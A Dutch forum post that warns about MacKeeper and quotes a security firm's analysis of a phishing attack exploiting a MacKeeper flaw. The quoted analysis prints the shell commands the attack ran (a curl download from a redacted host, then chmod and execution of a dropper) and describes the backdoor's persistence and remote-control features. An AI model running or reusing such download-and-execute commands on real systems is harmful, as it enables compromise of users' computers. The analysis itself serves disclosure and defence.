Ja hoor. Maar het wordt nog erger. MacKeeper kan nu niet langer pretenderen legitte OSX software te zijn.

Een beetje laat in het spel, maar nogmaals een bevestiging:
MacKeeper is vermomde malware:http://baesystemsai.blogspot.com/201...mackeeper.html
Een citaat:
The first reports on this vulnerability suggested that no malicious MacKeeper URLs had been spotted in the wild yet. Well, not anymore.
Since the proof-of-concept was published, it took just days for the first instances to be seen in the wild.
The attack this post discusses can be carried out via a phishing email that contains malicious URL.
Once clicked, the users running MacKeeper will be presented with a dialog that suggests they are infected with malware, prompting them for a password to remove this. The actual reason is so that the malware could be executed with the admin rights.
The webpage hosted by the attackers in this particular case has the following format:
(voor geciteerde code geraak ik niet gepost, lees uit de links)[/b]
where [BASE_64_ENCODED_STUB], once decoded, contains the following commands interpreted and executed by MacKeeper, using system shell:
curl -A 'Safari' -o /Users/Shared/dufh
http://[removed]/123/test/qapucin/bieber/210410/cormac.mcr;
chmod 755 /Users/Shared/dufh;
cd /Users/Shared;
./dufh
The launcher path for this command is specified within the [BASE_64_ENCODED_STUB] as"/bin/sh" (a symlink to the currently configured system shell), and the prompt message displayed to the user is:
"Your computer has malware that needs to be removed"
As a result, once the unsuspecting user click the malicious link, the following dialog box will pop up:

Once the password is specified, the malware will be downloaded, saved as /Users/Shared/dufh, and executed.
At this stage, the executable file dufh is a dropper. When run, it will dump an embedded executable and then launch it. The dropper will create a plist and update the LaunchAgents in order to enable an auto-start for the created executable ("<key>RunAtLoad</key>").
Backdoor functionality
The embedded executable is a bot that allows remote access.
It can perform the following actions:
Open a pipe stream and execute shell commands
Upload files to the C&C server
Download files from the C&C server
Set execution permissions and run downloaded files
The bot collects system information such as:
List of all processes and their status
Operating system name and version
User name
Availability of any VPN connections
Lees de rest in de link.
Ondanks een veroordeling in de USA voor Zeobit, blijkt dat ze via/na wellicht de verkoop aan Kromtech weer aan een aggressief (tele)verkoopsoffensief bezig zijn.
Getuige hiervan:
http://www.macfreak.nl/forums/topic/...l-verwijderen/
Hoog tijd dat Kromtech/ Zeobit hun lesje eens leren...
Enfin, met System Integrity Protection onder El Capitan komen ze er niet meer door denk ik...